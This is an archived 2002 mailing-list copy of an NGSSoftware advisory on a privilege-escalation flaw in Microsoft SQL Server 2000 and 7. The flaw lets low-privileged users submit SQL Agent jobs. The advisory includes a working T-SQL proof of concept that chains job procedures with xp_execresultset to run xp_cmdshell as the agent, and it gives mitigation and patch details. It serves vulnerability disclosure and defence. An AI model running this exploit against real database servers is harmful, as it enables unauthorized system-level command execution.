OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: David Litchfield (david_at_ngssoftware.com)
Date: Thu Aug 15 2002 - 22:14:04 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    NGSSoftware Insight Security Research Advisory

    Name: SQL Agent Jobs
    Systems: Microsoft SQL Server 2000 and 7
    Severity: High Risk
    Category: Privilege Escalation
    Vendor URL: http://www.microsoft.com/
    Author: David Litchfield (davidngssoftware.com)
    Advisory URL: http://www.ngssoftware.com/advisories/mssql-esppu.txt
    Date: 15th August 2002
    Advisory number: #NISR15002002B

    Description
    ***********
    With Microsoft SQL Server 2000 and 7 comes a "helper" service, the SQL
    Server agent. The Agent is responsible for restarting the database service
    if it stops for some reason, has a role to play in replication and runs
    scheduled jobs. As the public role can submit jobs to the SQL Agent to be
    executed a low privileged user may use this to gain control of the server.

    Details
    *******
    The 'Public' role is allowed to create and submit jobs to be executed by the
    SQL Agent. To do this one would use a combination of several stored
    procedures in the msdb database such as sp_add_job and sp_add_job_step, etc.
    As the SQL Agent is considerably more privileged than a simple login, often
    running in the security context of the local system account, it must ensure
    that, when a T-SQL job is submitted to it, it can't be abused. To defend
    against this is performs a

    SETUSER N'guest' WITH NORESET

    This effectively drops its high level of privileges so no low privileged
    login can submit something like

    exec master..xp_cmdshell 'dir'

    However, this can be trivially bypassed by causing the SQL Agent to
    reconnect after it's dropped its privileges. They can use one of the
    vulnerable extended stored procedures discussed in the NGSSoftware Alert
    NISR15002002A (http://www.ngssoftware.com/advisories/mssql-esppu.txt).

    Proof of Concept
    ****************

    -- GetSystemOnSQL
    -- For this to work the SQL Agent should be running.
    -- Further, you'll need to change SERVER_NAME in
    -- sp_add_jobserver to the SQL Server of your choice 

    --
-- David Litchfield
-- (davidngssoftware.com)
-- 18th July 2002

    USE msdb

    EXEC sp_add_job job_name = 'GetSystemOnSQL',
enabled = 1,
description = 'This will give a low privileged user access to
xp_cmdshell',
delete_level = 1

    EXEC sp_add_jobstep job_name = 'GetSystemOnSQL',
step_name = 'Exec my sql',
subsystem = 'TSQL',
command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''

    EXEC sp_add_jobserver job_name = 'GetSystemOnSQL',
server_name = 'SERVER_NAME'

    EXEC sp_start_job job_name = 'GetSystemOnSQL'

    Fix Information
***************
NGSSoftware informed Microsoft of these issues in July. To prevent low
privileged users from submitting jobs one should disallow public access to
the Job related stored procedures in the MSDB database particularly

    sp_add_job
sp_add_jobstep
sp_add_jobserver
sp_start_job

    Further Microsoft has released a patch that fixes several extended stored
procedure vulnerabilities that can be used in conjuction with a job to gain
extra privileges.

    Please see
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-042.asp
for more details.